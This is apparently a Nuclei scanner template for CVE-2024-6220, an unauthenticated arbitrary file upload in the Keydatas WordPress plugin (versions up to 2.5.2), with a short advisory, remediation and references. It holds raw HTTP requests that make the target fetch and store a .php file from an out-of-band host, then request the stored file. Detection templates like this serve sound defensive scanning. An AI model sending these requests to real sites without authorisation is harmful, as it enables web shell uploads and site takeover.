The Keydatas plugin for WordPress (known in Chinese as "简数采集器") is vulnerable to unrestricted file uploads due to missing file-type validation in the keydatas_downloadImages function in all versions up to and including 2.5.2. An unauthenticated attacker can upload arbitrary files to the server — potentially leading to remote code execution, site takeover, or other severe compromise.
PoC代码[已公开]
id: CVE-2024-6220
info:
name: WordPress Keydatas ≤ 2.5.2 - Arbitrary File Upload
author: hnd3884
severity: critical
description: |
The Keydatas plugin for WordPress (known in Chinese as "简数采集器") is vulnerable to unrestricted file uploads due to missing file-type validation in the keydatas_downloadImages function in all versions up to and including 2.5.2. An unauthenticated attacker can upload arbitrary files to the server — potentially leading to remote code execution, site takeover, or other severe compromise.
impact: |
Unauthenticated attackers can upload arbitrary files including PHP web shells through the keydatas_downloadImages function, achieving remote code execution and complete site compromise.
remediation: |
Update Keydatas plugin to version 2.5.3 or later to address the arbitrary file upload vulnerability.
reference:
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/keydatas/keydatas-252-unauthenticated-arbitrary-file-upload
- https://github.com/advisories/GHSA-29rm-j4cx-hmc5
- https://nvd.nist.gov/vuln/detail/CVE-2024-6220
classification:
cve-id: CVE-2024-6220
epss-score: 0.7782
epss-percentile: 0.9896
cwe-id: CWE-434
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cpe: cpe:2.3:a:keydatas:keydatas:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: keydatas
product: wordpress
tags: cve,cve2024,wp,wp-plugin,wordpress,keydatas,file-upload,rce,vkev
variables:
filename: "{{rand_base(5)}}.php"
oast_url: "{{interactsh-url}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /?__kds_flag=post HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
kds_password=keydatas.com&post_title=1&__kds_docImgs=http://{{oast_url}}/{{filename}}&__kds_download_imgs_flag=true
matchers:
- type: dsl
dsl:
- "status_code == 200"
- 'contains(body, "{\"rs\":1")'
condition: and
internal: true
extractors:
- type: regex
part: http_1_request
name: folder
group: 1
regex:
- '__kds_docImgs=http://([^&]+?\.php)'
internal: true
- raw:
- |
GET /wp-content/uploads/{{folder}} HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "<html><head></head><body>"
- type: status
status:
- 200
# digest: 4a0a00473045022075ec4233da71fd104aa4eefff1dfa83ae21521eb08818be0cfa72613ac31858e0221009d6801899f672676f4f3d32faeb22654f24fd5cdd2628dfc25de20bd9a5dbabe:922c64590222798bb761d5b6d8e72950